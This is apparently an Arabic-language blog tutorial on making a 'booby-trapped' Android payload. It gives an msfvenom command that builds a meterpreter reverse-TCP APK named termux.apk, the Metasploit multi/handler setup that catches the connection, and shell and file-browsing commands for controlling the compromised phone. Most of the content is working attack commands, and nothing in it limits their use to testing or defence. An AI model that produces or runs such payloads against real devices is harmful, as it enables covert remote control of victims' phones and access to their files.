كيفية إنشاء Payload ملغم واستخدام Metasploit
![صورة](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_sPRwICOJl_aj6O8lJ7qiUxVpDQCduisvp0M8FdKQAmJjVwCututAhHCZIzOL-HNU27OMgqggLFxyRr_50kGH0O0e_SGjJaqZ1ofKwIQQfwUeMV-EfBvXIsWsFw8mvTCkpThs98DeUj3RIIH0dXN-3hYbxNwKvi2rgcWTazWTWzsEPwW52FG1ueJs8InO/w640-h300/Metasploit%20Pro%20Penetration%20Testing%20Tools,%20Pen%20Testing%20Software.jpg)
Mr. RedRaccoon 1. إنشاء Payload ملغم باستخدام msfvenom: افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم: msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي ترغب في استخدامه. 2. فتح Metasploit: بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر: ./msfconsole 3. إعداد Metasploit لاستقبال الـ Payload: في Metasploit، اتبع الأوامر التالية: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي اخترته. 4. استخدام Metasploit للتحكم بالجهاز المخترق: بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز: help # عرض قائمة بالأوامر المتاحة shell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل ...